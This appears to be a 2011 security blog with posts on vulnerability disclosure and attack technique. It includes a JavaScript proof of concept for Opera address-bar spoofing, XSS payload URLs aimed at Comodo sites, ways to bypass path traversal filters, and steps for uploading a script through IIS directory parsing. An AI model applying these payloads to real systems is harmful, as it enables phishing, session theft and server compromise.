Fascinated by computer

Opera Address bar Spoofing vulnerability is not patched yet!?

Last year I reported a vulnerability in opera browser which leads users to be deceived and lets an attacker to show a fake website address to their victims.


PoC:

<script language="javascript"> function pause(pd) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < pd); } function Spoofing () { win = window.open('http://www.google.com','ne w') pause (3000) win = window.open('http://www.evilsite.com','ne w') } </script> <p align="center"> <a href="javascript: Spoofing()">Click Here</a></p>

Today I accidentally found the vulnerability still there! Opera developing team did not fix it yet! Is it really as trivial as this that they don't even try  to fix?!

What do you think?

By: Pouya | 2011/10/13 - 01:00:41 | Category: Security | Comments (18)

---

Security is important for Comodo

Recently heard on the Internet about hacking comodo by Iranian hackers.
three weeks ago I submitted a Significant number of vulnerabilities (including XSS. CRLF, full path disclosure, information leak) to comodo, and it's Over a week that they didn't fix any of them.

I didn't send the vulnerabilities to have some credit or something from them but only to show the real face of iran and iranian people.

In my believe, it's a mistake to steal digital certifications and use it against people As making stuxnet was.
If any person or government belives in freedom of expression and information , then violating of privacy of people will be meaningless. I expect to have a safe and private web surf as every user in america, italia, brazil, or egypt should have.
People around the world have a lot in common, So don't try to place them against each other.

Although Comodo is a victim of this attack, but they still neglect about the problems, This is not a good point for a company like Comodo, and I'm sure these bugs will be fixed in the next few days.
Remember, Although an XSS vulnerability does not give the attacker a direct access to the server,
but it can be One of the main pillars of an attack.

Hoping for a safe Internet.
----------------------------------
Update 2011-12-02
Comodo fixed many of bugs

XSS: http://www.comodo.com/ttb_searcher/!ML_MANAGE?email=Email%20Address&FUNC=1%3CScRiPt%20%3Ealert%28%27xss%27%29%3C%2fScRiPt%3E&interface=2&list_id=6 http://www.comodo.com/resources/webinars/view-webinar.php?cat=%22%20onmouseover%3dprompt%2811%29%20bad%3d%22&id=enhancing-your-business-with-social-media&title=Enhancing%20Your%20Business%20with%20Social%20Media http://enterprise.comodo.com//resources/download-form.php?cat=%22%20onmouseover%3dprompt%28110%29%20bad%3d%22&id=&title=&type= http://enterprise.comodo.com/resources/download-form.php?e=no&cat=\%22%20onmouseover=prompt%2811%29%20bad=\%22&id=secure-email-pki-management-2008-10&title=Secure%20Email%20and%20PKI%20Management&type=white-papers http://personalfirewall.comodo.com/setup.php?prod=%22%20onmouseover%3dprompt%2811%29%20bad%3d%22 https://secure.comodo.com/products/SSLIdASignup1b?csr=1%3C%2ftextarea%3E1%3CScRiPt%20%3Eprompt%28979212%29%3C%2fScRiPt%3E&days=17&days_radio=365&licenceCode=94102&product=24&serverSoftware=0&SID=vX5YZqBRwBShT0M3&totalCost= https://support.comodo.com/index.php?_a=steps&_m=troubleshooter&action=Next%20%3E&backid=a%3a1%3a{i%3a-1%3bi%3a0%3b}&backidpass=%27%20onmouseover%3dprompt%2811%29%20bad%3d%27¤ttroubleshooterid=&parenttroubleshooterid=21&troubleshootercatid=4 Server Informaion: (with phpinfo) https://support.comodo.com/test.php http://help.comodo.com/test.php

By: Pouya | 2011/05/07 - 12:29:25 | Category: General | Comments (2)

---

Path Traversal - Bypass Methods

Path traversal vulnerabilities are very common in the process of programming web applications.

Bypass Methods:
1. Encoding Data
for example encode the name of your file with common encoding methods:
download.php?getfile=Y29uZmlnLnBocA==
in above example the file name is base64 encoded.

 2. Encrypting Data
In this method you must use encrypting algorithms:
download.php?getfile=%63%6F%6E%66%69%67%2E%70%68%70%0A%09%09%09

3. Special Characters
In some web apps, it's possible to use special chars (like ~/  ../) in file names. This can be used by attackersto changing current directiory to another one.
example: download.php?getfile =~/../ boot

 4. File Extensions
Some web apps validate file's extension before letting it to be downloaded. An attacker can bypass this using null byte! for example:  "./../../../ boot.ini% 00.jpg"
This way web apps which use OS API will have this vulnerability because OS and  web server have Different interpretations about null bytes. In this example ,the real file name will be cutted down using API System to "./../../../ boot.ini". You may also use %20 ( ex: ../../../index.asp%20) .

5. Using HTTP Referrer
In This method the attacker directly edits HTTP Referrer value. Most web servers can't validate these types of variables correctly and will trust them by default.

Download Full Article

By: Pouya | 2011/05/06 - 23:30:08 | Category: Articles | Comments (1)

---

Slash is filtered, bypass method

Sometimes there are restrictions about some sections. this restriction can be done by some special softwares.
Suppose the user is denied to use '\' char. You can use "%tmp:~2,1%" to bypass the restriction as it's shown in image below:

By: Pouya | 2011/05/05 - 22:21:59 | Category: Security | Comments (0)

---

IIS parsing directory dangerous or not?

Some guys asked me "Is Parsing Vulnerability really dangerous?"

This is an example of what an attacker can do using this vulnerability:
Find a website which uses FCKeditor thats not configured properly.
Now  upload an evil file with your own way, for example the most common way is to rename your file to 'test.asp;test.jpg' then try to upload it. you'll see Dot character(.) in the file name will be renamed to underscore (_). (see figures 1,2,3)

(1)

(2)

(3)

Now let's create a folder with .asa extension, as you see in figure 4 the folder will be created.
So we can upload our evil asp script with .jpg extension in the folder, and finally open it in browser. (figures 5,6)

(4)

(5)

(6)

You can find new ideas.

By: Pouya | 2011/04/25 - 10:54:25 | Category: Security | Comments (0)

---